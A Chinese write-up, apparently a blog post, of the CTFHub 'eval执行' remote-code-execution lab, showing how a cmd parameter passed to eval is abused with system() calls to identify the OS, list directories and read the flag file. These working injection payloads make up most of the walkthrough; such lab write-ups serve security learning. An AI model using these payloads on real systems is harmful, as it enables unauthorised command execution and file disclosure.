CTFHub-RCE eval执行

观察源代码

  • 我们可以发现源代码是request请求,所以我们可以通过GET或者POST请求,利用cmd参数进行命令执行

判断是Windows还是Linux

复制代码
#### 用GET请求

![](https://i-blog.csdnimg.cn/img_convert/3953fb442538c15685b5aa6926a79cba.jpeg)
*

  ```php
  /?cmd=system('ipconfig');
  ```

<!-- -->

* 无回显 说明不是Windows系统 ![](https://i-blog.csdnimg.cn/img_convert/0b03e2d748cacda3d7860d5e27391c10.jpeg)

<!-- -->

*

  ```php
  /?cmd=system('ifconfig');
  ```

<!-- -->

* 可以发现有回显,说明命令执行成功,系统为Linux ![](https://i-blog.csdnimg.cn/img_convert/480728712941dd82146cac1a7ab842d3.jpeg)

查看有哪些文件

复制代码
```php
/?cmd=system('ls');
```

![](https://i-blog.csdnimg.cn/img_convert/24d60e2455ee4331bd91e436a1f8c719.jpeg)
  • 显示只有index.php文件, 我们再查询根目录下的文件
复制代码
```php
/?cmd=system('ls /');
```
  • 发现目标flag文件

打开flag文件

复制代码
```php
/?cmd=system('cat /flag_11649');
```

![](https://i-blog.csdnimg.cn/img_convert/cb6bcfb2dbe991c3d366ba1b4b681326.jpeg)
  • 成功获取flag
相关推荐
兢谨网安1 小时前
AI安全:从技术加固到体系化防御的实战演进
人工智能·安全·网络安全·渗透测试
xingxin323 小时前
PHP代码分析溯源(第3题)
安全·web安全·网络安全·php
零零信安5 小时前
2026年03月29日 勒索软件监测日报 | 零零信安暗网威胁情报
网络安全·勒索软件·数据泄露·暗网·零零信安
谪星·阿凯5 小时前
RCE漏洞:从溯源解析到实战防御的完整指南
网络安全
unable code7 小时前
[NISACTF 2022]easyssrf
网络安全·web·ctf·1024程序员节
程序员小崔日记8 小时前
一篇文章带你入门漏洞靶场:从 0 到 1 玩转 bWAPP(附完整安装教程)
xml·网络安全·漏洞学习·靶场搭建
xixixi777779 小时前
AI 用于漏洞检测、威胁狩猎、合规审查;安全沙箱 / 隐私计算保障 AI 模型与数据可信
人工智能·网络安全·ai·openai·数据·多模型
一个脚本boy11 小时前
【Billu_bOx1靶机的完整详细渗透测试附靶机下载链接】
web安全·网络安全
谪星·阿凯11 小时前
Pikachu靶场完整通关秘籍
安全·网络安全
CDN36012 小时前
CDN 报错 403/502/504 怎么解决?源站与防护策略排查
运维·网络安全